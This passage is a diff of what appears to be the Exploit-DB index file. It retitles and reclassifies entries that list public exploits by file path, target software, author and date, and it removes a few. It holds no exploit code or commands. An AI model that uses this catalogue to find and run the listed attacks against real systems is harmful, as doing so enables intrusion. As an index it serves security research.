Handling Security Bypass (1)",2006-01-09,"Breno Silva Pinto",linux,local,0 27057,platforms/linux/local/27057.py,"Sudo 1.6.x - Environment Variable Handling Security Bypass (2)",2006-01-09,"Breno Silva Pinto",linux,local,0 @@ -8497,7 +8500,7 @@ id,file,description,date,author,platform,type,port 29822,platforms/linux/local/29822.c,"Man Command - -H Flag Local Buffer Overflow",2007-04-06,"Daniel Roethlisberger",linux,local,0 29881,platforms/windows/local/29881.txt,"Adobe Acrobat Reader - ASLR + DEP Bypass with Sandbox Bypass",2013-11-28,"w3bd3vil & abh1sek",windows,local,0 29922,platforms/windows/local/29922.py,"Kingsoft Office Writer 2012 8.1.0.3385 - '.wps' Buffer Overflow (SEH)",2013-11-30,"Julien Ahrens",windows,local,0 -29950,platforms/osx/local/29950.js,"Apple 2.0.4 - Safari Unspecified Local",2007-05-04,poplix,osx,local,0 +29950,platforms/osx/local/29950.js,"Apple 2.0.4 - Safari Local Exploit",2007-05-04,poplix,osx,local,0 29954,platforms/linux/local/29954.txt,"ELinks Relative 0.10.6/011.1 - Path Arbitrary Code Execution",2007-05-07,"Arnaud Giersch",linux,local,0 30007,platforms/windows/local/30007.txt,"Notepad++ Plugin Notepad 1.5 - Local Exploit",2013-12-03,"Junwen Sun",windows,local,0 30096,platforms/osx/local/30096.txt,"Apple Mac OSX 10.4.9 - VPND Local Format String",2007-05-29,"Chris Anley",osx,local,0 @@ -8517,7 +8520,7 @@ id,file,description,date,author,platform,type,port 30468,platforms/windows/local/30468.pl,"RealNetworks RealPlayer 16.0.3.51/16.0.2.32 - '.rmp' Version Attribute Buffer Overflow",2013-12-24,"Gabor Seljan",windows,local,0 30474,platforms/multiple/local/30474.rb,"Mozilla Firefox 5.0 < 15.0.1 - __exposedProps__ XCS Code Execution (Metasploit)",2013-08-06,Metasploit,multiple,local,0 30477,platforms/windows/local/30477.txt,"Huawei Technologies du Mobile Broadband 16.0 - Privilege Escalation",2013-12-24,LiquidWorm,windows,local,0 -30484,platforms/bsd/local/30484.c,"Systrace - Multiple System Call Wrappers Concurrency Vulnerabilities",2007-08-09,"Robert N. M. Watson",bsd,local,0 +30484,platforms/bsd/local/30484.txt,"Systrace - Multiple System Call Wrappers Concurrency Vulnerabilities",2007-08-09,"Robert N. M. Watson",bsd,local,0 30503,platforms/linux/local/30503.txt,"BlueCat Networks Adonis 5.0.2.8 - CLI Privilege Escalation",2007-08-16,forloop,linux,local,0 30546,platforms/windows/local/30546.txt,"Microworld eScan (Multiple Products) - Privilege Escalation",2007-08-30,"Edi Strosar",windows,local,0 30970,platforms/multiple/local/30970.txt,"White_Dune 0.29beta791 - Multiple Local Code Execution Vulnerabilities",2008-01-02,"Luigi Auriemma",multiple,local,0 @@ -8625,7 +8628,7 @@ id,file,description,date,author,platform,type,port 33604,platforms/linux/local/33604.sh,"SystemTap 1.0/1.1 - '__get_argv()' / '__get_compat_argv()' Local Memory Corruption",2010-02-05,"Josh Stone",linux,local,0 33614,platforms/linux/local/33614.c,"dbus-glib pam_fprintd - Privilege Escalation",2014-06-02,"Sebastian Krahmer",linux,local,0 33623,platforms/linux/local/33623.txt,"Accellion Secure File Transfer Appliance - Multiple Command Restriction Weakness Privilege Escalations",2010-02-10,"Tim Brown",linux,local,0 -33725,platforms/aix/local/33725.txt,"IBM AIX 6.1.8 libodm - Arbitrary File Write",2014-06-12,Portcullis,aix,local,0 +33725,platforms/aix/local/33725.txt,"IBM AIX 6.1.8 - 'libodm' Arbitrary File Write",2014-06-12,Portcullis,aix,local,0 40342,platforms/win_x86-64/local/40342.py,"TeamViewer 11.0.65452 (x64) - Local Credentials Disclosure",2016-09-07,"Alexander Korznikov",win_x86-64,local,0 33791,platforms/arm/local/33791.rb,"Adobe Reader for Android - 'addJavascriptInterface' Exploit (Metasploit)",2014-06-17,Metasploit,arm,local,0 33799,platforms/solaris/local/33799.sh,"Sun Connection Update Manager for Solaris - Multiple Insecure Temporary File Creation Vulnerabilities",2010-03-24,"Larry W. Cashdollar",solaris,local,0 @@ -8665,7 +8668,7 @@ id,file,description,date,author,platform,type,port 34967,platforms/windows/local/34967.txt,"Telefonica O2 Connection Manager 8.7 - Service Trusted Path Privilege Escalation",2014-10-14,LiquidWorm,windows,local,0 34982,platforms/win_x86/local/34982.rb,"Microsoft Bluetooth Personal Area Networking - 'BthPan.sys' Privilege Escalation (Metasploit)",2014-10-15,Metasploit,win_x86,local,0 34987,platforms/linux/local/34987.c,"Linux Kernel 2.6.x - 'net/core/filter.c' Local Information Disclosure",2010-11-09,"Dan Rosenberg",linux,local,0 -35010,platforms/ios/local/35010.c,"Apple iOS 4.0.2 - Networking Packet Filter Rules Privilege Escalation",2010-11-22,Apple,ios,local,0 +35010,platforms/ios/local/35010.txt,"Apple iOS 4.0.2 - Networking Packet Filter Rules Privilege Escalation",2010-11-22,Apple,ios,local,0 35019,platforms/windows/local/35019.py,"Microsoft Windows - OLE Package Manager SandWorm Exploit",2014-10-20,"Vlad Ovtchinikov",windows,local,0 35020,platforms/win_x86/local/35020.rb,"Microsoft Windows - OLE Package Manager Code Execution (MS14-060) (Metasploit)",2014-10-20,Metasploit,win_x86,local,0 35021,platforms/linux/local/35021.rb,"Linux PolicyKit - Race Condition Privilege Escalation (Metasploit)",2014-10-20,Metasploit,linux,local,0 @@ -8832,7 +8835,7 @@ id,file,description,date,author,platform,type,port 38089,platforms/osx/local/38089.txt,"Disconnect.me Mac OSX Client 2.0 - Privilege Escalation",2015-09-06,"Kristian Erik Hermansen",osx,local,0 38136,platforms/osx/local/38136.txt,"Apple Mac OSX Install.Framework - SUID Root Runner Binary Privilege Escalation",2015-09-10,"Google Security Research",osx,local,0 38137,platforms/osx/local/38137.txt,"Apple Mac OSX Install.Framework - Arbitrary mkdir / unlink and chown to Admin Group",2015-09-10,"Google Security Research",osx,local,0 -38095,platforms/windows/local/38095.pl,"VeryPDF HTML Converter 2.0 - SEH/ToLower() Bypass Buffer Overflow",2015-09-07,"Robbie Corley",windows,local,0 +38095,platforms/windows/local/38095.pl,"VeryPDF HTML Converter 2.0 - Buffer Overflow (SEH/ToLower() Bypass)",2015-09-07,"Robbie Corley",windows,local,0 38138,platforms/osx/local/38138.txt,"Apple Mac OSX - Install.framework suid Helper Privilege Escalation",2015-09-10,"Google Security Research",osx,local,0 38147,platforms/windows/local/38147.pl,"Logitech Webcam Software 1.1 - 'eReg.exe' Buffer Overflow (SEH Unicode)",2015-09-11,"Robbie Corley",windows,local,0 40975,platforms/android/local/40975.rb,"Google Android - get_user/put_user Exploit (Metasploit)",2016-12-29,Metasploit,android,local,0 @@ -8852,7 +8855,7 @@ id,file,description,date,author,platform,type,port 38287,platforms/windows/local/38287.txt,"Kaspersky AntiVirus - ThinApp Parser Stack Buffer Overflow",2015-09-22,"Google Security Research",windows,local,0 38289,platforms/windows/local/38289.txt,"Cisco AnyConnect Secure Mobility Client 3.1.08009 - Privilege Escalation",2015-09-22,"Google Security Research",windows,local,0 38298,platforms/linux/local/38298.txt,"xNBD - '/tmp/xnbd.log' Insecure Temporary File Handling",2013-02-06,"Sebastian Pipping",linux,local,0 -38299,platforms/windows/local/38299.c,"Symantec Encryption Desktop 10 - Buffer Overflow Privilege Escalation",2012-02-25,"Nikita Tarakanov",windows,local,0 +38299,platforms/windows/local/38299.txt,"Symantec Encryption Desktop 10 - Buffer Overflow Privilege Escalation",2012-02-25,"Nikita Tarakanov",windows,local,0 38303,platforms/osx/local/38303.c,"Cisco AnyConnect 3.1.08009 - Privilege Escalation (via DMG Install Script)",2015-09-23,"Yorick Koster",osx,local,0 38447,platforms/multiple/local/38447.pl,"libsndfile 1.0.25 - Heap Overflow",2015-10-13,"Marco Romano",multiple,local,0 38319,platforms/windows/local/38319.py,"WinRar 5.21 - SFX OLE Command Execution",2015-09-25,R-73eN,windows,local,0 @@ -8902,7 +8905,7 @@ id,file,description,date,author,platform,type,port 38903,platforms/windows/local/38903.txt,"iniNet SpiderControl SCADA Web Server Service 2.02 - Insecure File Permissions",2015-12-08,LiquidWorm,windows,local,0 38904,platforms/windows/local/38904.txt,"iniNet SpiderControl PLC Editor Simatic 6.30.04 - Insecure File Permissions",2015-12-08,LiquidWorm,windows,local,0 38937,platforms/linux/local/38937.txt,"Apache Libcloud Digital Ocean API - Local Information Disclosure",2014-01-01,anonymous,linux,local,0 -39010,platforms/linux/local/39010.c,"QEMU (Gentoo) - Local Priv Escalation",2015-12-17,zx2c4,linux,local,0 +39010,platforms/linux/local/39010.c,"QEMU (Gentoo) - Privilege Escalation",2015-12-17,zx2c4,linux,local,0 39035,platforms/win_x86-64/local/39035.txt,"Microsoft Windows 8.1 - 'win32k' Privilege Escalation (MS15-010)",2015-12-18,"Jean-Jamil Khalife",win_x86-64,local,0 39061,platforms/android/local/39061.txt,"GoToMeeting for Android - Multiple Local Information Disclosure Vulnerabilities",2014-01-23,"Claudio J. Lacayo",android,local,0 39102,platforms/windows/local/39102.py,"EasyCafe Server 2.2.14 - Remote File Read",2015-12-26,R-73eN,windows,local,0 @@ -9050,7 +9053,7 @@ id,file,description,date,author,platform,type,port 40483,platforms/windows/local/40483.txt,"Leap Service - Unquoted Service Path Privilege Escalation",2016-10-09,"Ross Marks",windows,local,0 40484,platforms/windows/local/40484.txt,"Wacom Consumer Service - Unquoted Service Path Privilege Escalation",2016-10-09,"Ross Marks",windows,local,0 40485,platforms/windows/local/40485.txt,"Foxit Cloud Update Service - Unquoted Service Path Privilege Escalation",2016-10-09,"Ross Marks",windows,local,0 -40488,platforms/linux/local/40488.txt,"Apache Tomcat 8/7/6 (RedHat-Based Distros) - Privilege Escalation",2016-10-10,"Dawid Golunski",linux,local,0 +40488,platforms/linux/local/40488.txt,"Apache Tomcat 8/7/6 (RedHat Based Distros) - Privilege Escalation",2016-10-10,"Dawid Golunski",linux,local,0 40489,platforms/linux/local/40489.txt,"Linux Kernel 4.6.2 (Ubuntu 16.04.1) - 'IP6T_SO_SET_REPLACE' Privilege Escalation",2016-10-10,"Qian Zhang",linux,local,0 40490,platforms/windows/local/40490.txt,"Zend Studio IDE 13.5.1 - Insecure File Permissions Privilege Escalation",2016-10-10,hyp3rlinx,windows,local,0 40494,platforms/windows/local/40494.txt,"Minecraft Launcher 1.6.61 - Insecure File Permissions Privilege Escalation",2016-10-11,"Ross Marks",windows,local,0 @@ -9127,7 +9130,7 @@ id,file,description,date,author,platform,type,port 40921,platforms/linux/local/40921.sh,"Nagios < 4.2.4 - Privilege Escalation",2016-12-15,"Dawid Golunski",linux,local,0 40931,platforms/multiple/local/40931.txt,"iOS 10.1.1 / macOS 10.12 16A323 XNU Kernel - set_dp_control_port Lack of Locking Use-After-Free",2016-12-16,"Google Security Research",multiple,local,0 40937,platforms/linux/local/40937.txt,"Apport 2.x (Ubuntu Desktop 12.10 < 16.04) - Local Code Execution",2016-12-14,"Donncha OCearbhaill",linux,local,0 -40938,platforms/linux/local/40938.py,"RedStar 3.0 Server - 'BEAM & RSSMON' Command Execution (Shellshock)",2016-12-18,"Hacker Fantastic",linux,local,0 +40938,platforms/linux/local/40938.py,"RedStar 3.0 Server - 'BEAM' / 'RSSMON' Command Injection (Shellshock)",2016-12-18,"Hacker Fantastic",linux,local,0 40943,platforms/linux/local/40943.txt,"Google Chrome + Fedora 25 / Ubuntu 16.04 - 'tracker-extract' / 'gnome-video-thumbnailer' + 'totem' Drive-By Download",2016-12-13,"Chris Evans",linux,local,0 40950,platforms/aix/local/40950.sh,"IBM AIX 6.1/7.1/7.2 - 'Bellmail' Privilege Escalation",2016-12-22,"Hector X. Monsegur",aix,local,0 40953,platforms/linux/local/40953.sh,"Vesta Control Panel 0.9.8-16 - Privilege Escalation",2016-12-22,"Luka Pusic",linux,local,0 @@ -9381,7 +9384,7 @@ id,file,description,date,author,platform,type,port 88,platforms/linux/remote/88.c,"GtkFtpd 1.0.4 - Buffer Overflow",2003-08-28,vade79,linux,remote,21 89,platforms/linux/remote/89.c,"Linux pam_lib_smb < 1.1.6 - '/bin/login' Remote Exploit",2003-08-29,vertex,linux,remote,23 90,platforms/windows/remote/90.c,"eMule/xMule/LMule - OP_SERVERMESSAGE Format String",2003-09-01,"Rémi Denis-Courmont",windows,remote,4661 -92,platforms/windows/remote/92.c,"Microsoft WordPerfect Document Converter - Exploit (MS03-036)",2003-09-06,valgasu,windows,remote,0 +92,platforms/windows/remote/92.c,"Microsoft WordPerfect Document Converter (Windows NT4 Workstation SP5/SP6 French) - File Template Buffer Overflow (MS03-036)",2003-09-06,valgasu,windows,remote,0 95,platforms/multiple/remote/95.c,"Roger Wilco 1.x - Client Data Buffer Overflow",2003-09-10,"Luigi Auriemma",multiple,remote,0 96,platforms/osx/remote/96.c,"4D WebSTAR FTP Server Suite - Remote Buffer Overflow",2003-09-11,B-r00t,osx,remote,21 97,platforms/windows/remote/97.c,"Microsoft Windows - 'RPC DCOM' Scanner (MS03-039)",2003-09-12,"Doke Scott",windows,remote,135 @@ -9672,7 +9675,7 @@ id,file,description,date,author,platform,type,port 1124,platforms/linux/remote/1124.pl,"IPSwitch IMail Server 8.15 - IMAPD Remote Code Execution",2005-08-01,kingcope,linux,remote,143 1130,platforms/windows/remote/1130.c,"CA BrightStor ARCserve Backup Agent - 'dbasqlr.exe' Remote Exploit",2005-08-03,cybertronic,windows,remote,6070 1131,platforms/windows/remote/1131.c,"CA BrightStor ARCserve Backup - 'dsconfig.exe' Buffer Overflow",2005-08-03,cybertronic,windows,remote,41523 -1132,platforms/windows/remote/1132.c,"CA BrightStor ARCserve Backup - Exploiter Tool",2005-08-03,cybertronic,windows,remote,6070 +1132,platforms/windows/remote/1132.c,"CA BrightStor ARCserve Backup - Overflow",2005-08-03,cybertronic,windows,remote,6070 1138,platforms/linux/remote/1138.c,"nbSMTP 0.99 - 'util.c' Client-Side Command Execution",2005-08-05,CoKi,linux,remote,0 1139,platforms/linux/remote/1139.c,"Ethereal 10.x - AFP Protocol Dissector Remote Format String",2005-08-06,vade79,linux,remote,0 1144,platforms/windows/remote/1144.html,"Microsoft Internet Explorer - 'blnmgr.dll' COM Object Remote Exploit (MS05-038)",2005-08-09,FrSIRT,windows,remote,0 @@ -10051,7 +10054,7 @@ id,file,description,date,author,platform,type,port 4087,platforms/linux/remote/4087.c,"BitchX 1.1-final - 'EXEC' Remote Command Execution",2007-06-21,clarity_,linux,remote,0 4093,platforms/multiple/remote/4093.pl,"Apache mod_jk 1.2.19/1.2.20 - Remote Buffer Overflow",2007-06-22,eliteboy,multiple,remote,80 4094,platforms/windows/remote/4094.html,"RKD Software BarCode ActiveX Control 'BarCodeAx.dll' 4.9 - Remote Overflow",2007-06-22,callAX,windows,remote,0 -4101,platforms/windows/remote/4101.html,"NCTAudioEditor2 ActiveX DLL 'NCTWMAFile2.dll 2.6.2.157' - Exploit",2007-06-25,shinnai,windows,remote,0 +4101,platforms/windows/remote/4101.html,"NCTAudioEditor2 ActiveX DLL 'NCTWMAFile2.dll 2.6.2.157' - File Write",2007-06-25,shinnai,windows,remote,0 4109,platforms/windows/remote/4109.html,"NCTAudioStudio2 - ActiveX DLL 2.6.1.148 'CreateFile()'/ Insecure Method",2007-06-26,shinnai,windows,remote,0 4110,platforms/windows/remote/4110.html,"Avax Vector 'Avaxswf.dll' 1.0.0.1 - ActiveX Arbitrary Data Write",2007-06-26,callAX,windows,remote,0 4119,platforms/windows/remote/4119.html,"HP Digital Imaging 'hpqxml.dll 2.0.0.133' - Arbitrary Data Write Exploit",2007-06-27,callAX,windows,remote,0 @@ -10624,7 +10627,6 @@ id,file,description,date,author,platform,type,port 9805,platforms/windows/remote/9805.html,"Oracle - Document Capture BlackIce DEVMODE Exploit",2009-09-29,pyrokinesis,windows,remote,0 9810,platforms/windows/remote/9810.txt,"EnjoySAP 6.4/7.1 - File Overwrite",2009-09-28,sh2kerr,windows,remote,0 9813,platforms/windows/remote/9813.txt,"Mereo Web Server 1.8 - Source Code Disclosure",2009-09-25,Dr_IDE,windows,remote,80 -9814,platforms/windows/remote/9814.py,"CDBurnerXP 4.2.4.1351 - Exploit",2009-09-25,Dr_IDE,windows,remote,0 9815,platforms/windows/remote/9815.py,"Core FTP LE 2.1 build 1612 - Local Buffer Overflow (PoC)",2009-09-25,Dr_IDE,windows,remote,0 9816,platforms/windows/remote/9816.py,"VideoLAN VLC Media Player 1.0.2 - 'smb://' URI Stack Overflow (PoC)",2009-09-25,Dr_IDE,windows,remote,0 9817,platforms/windows/remote/9817.py,"CuteFTP 8.3.3 - 'create new site' Local Buffer Overflow (PoC)",2009-09-25,Dr_IDE,windows,remote,0 @@ -10696,7 +10698,7 @@ id,file,description,date,author,platform,type,port 10024,platforms/linux/remote/10024.rb,"Madwifi < 0.9.2.1 - SIOCGIWSCAN Buffer Overflow (Metasploit)",2006-12-08,"Julien Tinnes",linux,remote,0 10025,platforms/linux/remote/10025.rb,"University of Washington - imap LSUB Buffer Overflow (Metasploit)",2000-04-16,patrick,linux,remote,143 10026,platforms/linux/remote/10026.rb,"Snort 2.4.0 < 2.4.3 - Back Orifice Pre-Preprocessor Remote Exploit (Metasploit)",2005-10-18,"KaiJern Lau",linux,remote,9080 -10027,platforms/linux/remote/10027.rb,"PeerCast 0.1216 - Exploit (Metasploit)",2006-03-08,MC,linux,remote,7144 +10027,platforms/linux/remote/10027.rb,"PeerCast 0.1216 - Stack Overflow (Metasploit)",2006-03-08,MC,linux,remote,7144 10028,platforms/cgi/remote/10028.rb,"Linksys WRT54G < 4.20.7 / WRT54GS < 1.05.2 - 'apply.cgi' Buffer Overflow (Metasploit)",2005-09-13,"Raphael Rigo",cgi,remote,80 10029,platforms/linux/remote/10029.rb,"Berlios GPSD 1.91-1 < 2.7-2 - Format String",2005-05-25,"Yann Senotier",linux,remote,2947 10030,platforms/linux/remote/10030.rb,"DD-WRT HTTP v24-SP1 - Command Injection",2009-07-20,"H D Moore",linux,remote,80 @@ -10743,9 +10745,9 @@ id,file,description,date,author,platform,type,port 10610,platforms/linux/remote/10610.rb,"CoreHTTP 0.5.3.1 - 'CGI' Arbitrary Command Execution",2009-12-23,"Aaron Conole",linux,remote,0 14257,platforms/windows/remote/14257.py,"Hero DVD Remote 1.0 - Buffer Overflow",2010-07-07,chap0,windows,remote,0 10715,platforms/windows/remote/10715.rb,"HP Application Recovery Manager - 'OmniInet.exe' Buffer Overflow",2009-12-26,EgiX,windows,remote,5555 -10765,platforms/windows/remote/10765.py,"BigAnt Server 2.52 - Exploit (SEH)",2009-12-29,Lincoln,windows,remote,6660 +10765,platforms/windows/remote/10765.py,"BigAnt Server 2.52 - Overflow (SEH)",2009-12-29,Lincoln,windows,remote,6660 10791,platforms/windows/remote/10791.py,"Microsoft IIS - ASP Multiple Extensions Security Bypass 5.x/6.x Vulnerabilities",2009-12-30,emgent,windows,remote,80 -10911,platforms/windows/remote/10911.py,"NetTransport Download Manager 2.90.510 - Exploit",2010-01-02,Lincoln,windows,remote,0 +10911,platforms/windows/remote/10911.py,"NetTransport Download Manager 2.90.510 - Overflow (SEH)",2010-01-02,Lincoln,windows,remote,0 10973,platforms/windows/remote/10973.py,"BigAnt Server 2.52 - Remote Buffer Overflow (2)",2010-01-03,DouBle_Zer0,windows,remote,0 10980,platforms/linux/remote/10980.txt,"Skype for Linux 2.1 Beta - Multiple Strange Behaviour Vulnerabilities",2010-01-04,emgent,linux,remote,0 11022,platforms/novell/remote/11022.pl,"Novell eDirectory 8.8 SP5 - Authenticated Remote Buffer Overflow",2010-01-06,"His0k4 & Simo36",novell,remote,0 @@ -10854,7 +10856,7 @@ id,file,description,date,author,platform,type,port 13834,platforms/windows/remote/13834.html,"Sygate Personal Firewall 5.6 build 2808 - ActiveX with DEP Bypass",2010-06-11,Lincoln,windows,remote,0 13850,platforms/multiple/remote/13850.pl,"Litespeed Technologies - Web Server Remote Poison Null Byte Exploit",2010-06-13,kingcope,multiple,remote,80 13853,platforms/linux/remote/13853.pl,"UnrealIRCd 3.2.8.1 - Remote Downloader/Execute",2010-06-13,anonymous,linux,remote,0 -13903,platforms/windows/remote/13903.py,"File Sharing Wizard 1.5.0 - Exploit (SEH)",2010-06-17,b0nd,windows,remote,0 +13903,platforms/windows/remote/13903.py,"File Sharing Wizard 1.5.0 - Overflow (SEH)",2010-06-17,b0nd,windows,remote,0 13932,platforms/windows/remote/13932.py,"(Gabriel's FTP Server) Open & Compact FTP Server 1.2 - Full System Access",2010-06-18,"Serge Gorbunov",windows,remote,0 14360,platforms/multiple/remote/14360.txt,"Struts2/XWork < 2.2.0 - Remote Command Execution",2010-07-14,"Meder Kydyraliev",multiple,remote,0 14013,platforms/windows/remote/14013.txt,"UFO: Alien Invasion 2.2.1 - Arbitrary Code Execution",2010-06-24,"Jason Geffner",windows,remote,0 @@ -10873,8 +10875,8 @@ id,file,description,date,author,platform,type,port 14267,platforms/windows/remote/14267.txt,"EA Battlefield 2 / Battlefield 2142 - Multiple Arbitrary File Upload Vulnerabilities",2010-07-08,"Luigi Auriemma",windows,remote,0 14269,platforms/windows/remote/14269.html,"FathFTP 1.7 - ActiveX Buffer Overflow",2010-07-08,blake,windows,remote,0 14272,platforms/osx/remote/14272.py,"UFO: Alien Invasion 2.2.1 (OSX Snow Leopard) - IRC Client Remote Code Execution (ROP)",2010-07-08,d1dn0t,osx,remote,0 -14275,platforms/windows/remote/14275.txt,"Real Player 12.0.0.879 - Exploit",2010-07-08,webDEViL,windows,remote,0 -14287,platforms/windows/remote/14287.cpp,"Sun Java Web Server 7.0 u7 - Exploit (DEP Bypass)",2010-07-09,dmc,windows,remote,0 +14275,platforms/windows/remote/14275.txt,"Real Player 12.0.0.879 - Code Execution",2010-07-08,webDEViL,windows,remote,0 +14287,platforms/windows/remote/14287.cpp,"Sun Java Web Server 7.0 u7 - Overflow (DEP Bypass)",2010-07-09,dmc,windows,remote,0 14309,platforms/windows/remote/14309.html,"RSP MP3 Player OCX 3.2 - ActiveX Buffer Overflow",2010-07-09,blake,windows,remote,0 14385,platforms/windows/remote/14385.html,"Avant Browser 11.7 build 45 - Clickjacking",2010-07-17,"Pouya Daneshmand",windows,remote,0 14386,platforms/multiple/remote/14386.html,"Opera Browser 10.60 - Clickjacking",2010-07-17,"Pouya Daneshmand",multiple,remote,0 @@ -10889,7 +10891,7 @@ id,file,description,date,author,platform,type,port 14416,platforms/windows/remote/14416.html,"SapGUI BI 7100.1.400.8 - Heap Corruption",2010-07-20,"Elazar Broad",windows,remote,0 14447,platforms/windows/remote/14447.html,"Multiple Browsers (FF3.6.7/SM 2.0.6) - Clickjacking",2010-07-23,"Pouya Daneshmand",windows,remote,0 14451,platforms/windows/remote/14451.rb,"EasyFTP Server 1.7.0.11 - 'LIST' Authenticated Remote Buffer Overflow (Metasploit)",2010-07-23,"Muhamad Fadzil Ramli",windows,remote,0 -14456,platforms/aix/remote/14456.c,"IBM AIX 5l FTPd - Remote DES Hash Exploit",2010-07-24,kingcope,aix,remote,0 +14456,platforms/aix/remote/14456.c,"IBM AIX 5l - 'FTPd' Remote DES Hash Exploit",2010-07-24,kingcope,aix,remote,0 14496,platforms/windows/remote/14496.py,"UPlusFTP Server 1.7.1.01 - Authenticated HTTP Remote Buffer Overflow",2010-07-28,"Karn Ganeshen & corelanc0d3r",windows,remote,0 14489,platforms/unix/remote/14489.c,"Apache Tomcat < 6.0.18 - 'utf8' Directory Traversal",2010-07-28,mywisdom,unix,remote,0 14492,platforms/windows/remote/14492.c,"Symantec Ams Intel Alert Handler Service - Design Flaw",2010-07-28,Spider,windows,remote,0 @@ -11003,7 +11005,7 @@ id,file,description,date,author,platform,type,port 15937,platforms/multiple/remote/15937.pl,"NetSupport Manager Agent - Remote Buffer Overflow (1)",2011-01-08,ikki,multiple,remote,0 16123,platforms/hardware/remote/16123.txt,"Comcast DOCSIS 3.0 Business Gateways - Multiple Vulnerabilities",2011-02-06,"Trustwave's SpiderLabs",hardware,remote,0 15963,platforms/windows/remote/15963.rb,"Microsoft Windows - Common Control Library 'Comctl32' Heap Overflow (MS10-081)",2011-01-10,"Nephi Johnson",windows,remote,0 -15984,platforms/windows/remote/15984.html,"Microsoft Data Access Components - Exploit (MS11-002)",2011-01-12,"Peter Vreugdenhil",windows,remote,0 +15984,platforms/windows/remote/15984.html,"Microsoft Data Access Components - Overflow (PoC) (MS11-002)",2011-01-12,"Peter Vreugdenhil",windows,remote,0 16014,platforms/windows/remote/16014.html,"Novell iPrint 5.52 - ActiveX 'GetDriverSettings()' Remote Exploit",2011-01-19,Dr_IDE,windows,remote,0 16036,platforms/windows/remote/16036.rb,"Golden FTP Server 4.70 - PASS Command Buffer Overflow",2011-01-23,"cd1zz & iglesiasgg",windows,remote,0 16041,platforms/multiple/remote/16041.txt,"Sun Microsystems SunScreen Firewall - Root Exploit",2011-01-25,kingcope,multiple,remote,0 @@ -11403,7 +11405,7 @@ id,file,description,date,author,platform,type,port 16730,platforms/windows/remote/16730.rb,"3Com 3CDaemon 2.0 FTP Server - 'Username' Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,0 16731,platforms/win_x86/remote/16731.rb,"Oracle 9i XDB (Windows x86) - FTP PASS Overflow (Metasploit)",2010-04-30,Metasploit,win_x86,remote,0 16732,platforms/windows/remote/16732.rb,"httpdx - 'tolog()' Format String (Metasploit) (1)",2010-08-25,Metasploit,windows,remote,0 -16733,platforms/windows/remote/16733.rb,"FileCOPA FTP Server (Pre 18 Jul Version) - Exploit (Metasploit)",2010-04-30,Metasploit,windows,remote,21 +16733,platforms/windows/remote/16733.rb,"FileCOPA FTP Server (Pre 18 Jul Version) - 'LIST' Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,21 16734,platforms/windows/remote/16734.rb,"EasyFTP Server 1.7.0.11 - LIST Command Stack Buffer Overflow (Metasploit)",2010-08-03,Metasploit,windows,remote,0 16735,platforms/windows/remote/16735.rb,"NetTerm NetFTPD - 'USER' Buffer Overflow (Metasploit)",2010-10-05,Metasploit,windows,remote,0 16736,platforms/windows/remote/16736.rb,"FTPShell 5.1 - Stack Buffer Overflow (Metasploit)",2010-11-14,Metasploit,windows,remote,0 @@ -11731,7 +11733,7 @@ id,file,description,date,author,platform,type,port 18102,platforms/windows/remote/18102.rb,"AbsoluteFTP 1.9.6 < 2.2.10 - 'LIST' Remote Buffer Overflow (Metasploit)",2011-11-09,Node,windows,remote,0 18123,platforms/windows/remote/18123.rb,"Viscom Image Viewer CP Pro 8.0/Gold 6.0 - ActiveX Control (Metasploit)",2011-11-17,Metasploit,windows,remote,0 18125,platforms/windows/remote/18125.rb,"Wireshark - console.lua pre-loading (Metasploit)",2011-11-19,Metasploit,windows,remote,0 -18134,platforms/windows/remote/18134.rb,"Viscom Software Movie Player Pro SDK ActiveX 6.8 - Exploit (Metasploit)",2011-11-20,Metasploit,windows,remote,0 +18134,platforms/windows/remote/18134.rb,"Viscom Software Movie Player Pro SDK ActiveX 6.8 - Stack-Based Buffer Overflow (Metasploit)",2011-11-20,Metasploit,windows,remote,0 18138,platforms/windows/remote/18138.txt,"VMware - Update Manager Directory Traversal",2011-11-21,"Alexey Sintsov",windows,remote,0 18145,platforms/linux/remote/18145.py,"Wireshark 1.4.4 - DECT Dissector Remote Buffer Overflow",2011-11-22,ipv,linux,remote,0 18171,platforms/multiple/remote/18171.rb,"Java Applet Rhino Script Engine - Remote Code Execution (Metasploit)",2011-11-30,Metasploit,multiple,remote,0 @@ -11862,11 +11864,10 @@ id,file,description,date,author,platform,type,port 19047,platforms/aix/remote/19047.txt,"Stalker Internet Mail Server 1.6 - Buffer Overflow",2001-09-12,"David Luyer",aix,remote,0 19048,platforms/aix/remote/19048.txt,"IRIX 6.4 - 'pfdisplay.cgi' Exploit",1998-04-07,"J.A. Gutierrez",aix,remote,0 19069,platforms/linux/remote/19069.txt,"Qualcomm Eudora Internet Mail Server 1.2 - Buffer Overflow",1998-04-14,"Netstat Webmaster",linux,remote,0 -19076,platforms/linux/remote/19076.txt,"Apple Personal Web Sharing 1.1 - Exploit",1998-04-10,"Netstat Webmaster",linux,remote,0 -19079,platforms/linux/remote/19079.c,"id Software Solaris Quake II 3.13/3.14 / QuakeWorld 2.0/2.1 / Quake 1.9/3.13/3.14 - Exploit",1998-05-01,"Mark Zielinski",linux,remote,0 +19079,platforms/linux/remote/19079.c,"id Software Solaris Quake II 3.13/3.14 / QuakeWorld 2.0/2.1 / Quake 1.9/3.13/3.14 - Command Execution",1998-05-01,"Mark Zielinski",linux,remote,0 19081,platforms/multiple/remote/19081.txt,"Lynx 2.8 - Buffer Overflow",1998-05-03,"Michal Zalewski",multiple,remote,0 19083,platforms/windows/remote/19083.cpp,"Cheyenne Inoculan for Windows NT 4.0 - Share",1998-06-10,"Paul Boyer",windows,remote,0 -19084,platforms/multiple/remote/19084.txt,"Metainfo Sendmail 2.0/2.5 & MetaIP 3.1 - Exploit",1998-06-30,"Jeff Forristal",multiple,remote,0 +19084,platforms/multiple/remote/19084.txt,"Metainfo Sendmail 2.0/2.5 / MetaIP 3.1 - Upload / Execute Read Scripts",1998-06-30,"Jeff Forristal",multiple,remote,0 19086,platforms/linux/remote/19086.c,"WU-FTPD 2.4.2 / SCO Open Server 5.0.5 / ProFTPd 1.2 pre1 - 'realpath' Exploit (1)",1999-02-09,"smiler & cossack",linux,remote,21 19087,platforms/linux/remote/19087.c,"WU-FTPD 2.4.2 / SCO Open Server 5.0.5 / ProFTPd 1.2 pre1 - 'realpath' Exploit (2)",1999-02-09,"jamez & c0nd0r",linux,remote,21 19091,platforms/hardware/remote/19091.py,"F5 BIG-IP - Authentication Bypass",2012-06-12,"David Kennedy (ReL1K)",hardware,remote,0 @@ -11878,7 +11879,7 @@ id,file,description,date,author,platform,type,port 